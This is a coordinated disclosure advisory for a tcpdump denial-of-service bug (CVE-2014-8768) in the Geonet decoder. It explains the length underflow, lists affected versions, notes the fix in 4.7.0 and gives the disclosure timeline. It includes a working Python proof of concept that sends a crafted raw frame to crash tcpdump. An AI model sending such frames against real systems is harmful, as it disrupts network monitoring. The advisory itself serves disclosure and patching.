CVE-2014-8768 tcpdump denial of service in verbose mode using malformed Geonet payload 1. Background tcpdump is a powerful command-line packet analyzer. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached. 2. Summary Information It was found out that malformed network traffic (Geonet-based) can lead to an application crash (denial of service) if verbose output of tcpdump monitoring the network is used. 3. Technical Description The application decoder for the geonet protocol fails to perform external input validation and performs insufficient checking on length computations leading to an unsafe decrement and underflow in the function geonet_print(netdissect_options *ndo, const u_char *eth, const u_char *bp, u_int length) The affected variable is length which is later on used to print a memory chunk which eventually leads to a segfault. The function contains several unsafe computations updating the length variable. To reproduce start tcpdump on a network interface sudo tcpdump -i lo -s 0 -n -v (running the program with sudo might hide the segfault message on certain environments, see dmesg for details) and use the following python program to generate a frame on the network (might also need sudo): #!/usr/bin/env python from socket import socket, AF_PACKET, SOCK_RAW s = socket(AF_PACKET, SOCK_RAW) s.bind(("lo", 0)) geonet_frame = "\x00\x1f\xc6\x51\x07\x07\x07\x07\x07\x07\x07\x07\x07\x07\xc6\x51\x07\x07\x07\x07\x07\x07\xef\x06\x07\x35\x97\x00\x24\x8c\x7a\xdf\x6f\x08\x00\x45\x00\x00\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01\x68\x0a\x01\x01\x01\x99\x80\x00\x35\x00\x29\x16\xa5\x01\x76\x01\x00\x00\xff\x00\x00\x01\x00\x00\x00" s.send(geonet_frame) 4. Affected versions Affected versions are 4.5.0 through 4.6.2 (segfaults were reproducible in versions up to 4.6.1 on Ubuntu 14.04, but not reliably in 4.6.2. Code audit showed that unsafe computations are performed in 4.6.2, but the trigger frame might need to look different). 5. Fix The problem is fixed in the upcoming version tcpdump 4.7.0 6. Advisory Timeline 2014-11-08 Discovered 2014-11-09 Requested CVE 2014-11-11 Reported vendor by email 2014-11-12 Vendor made a fix available as repository patch 2014-11-13 CVE number received 2014-11-13 Published CVE advisory 7. Credit The issue was found by Steffen Bauch Twitter: @steffenbauch http://steffenbauch.de using a slightly enhanced version of american fuzzy lop (https://code.google.com/p/american-fuzzy-lop/) created by Michal Zalewski.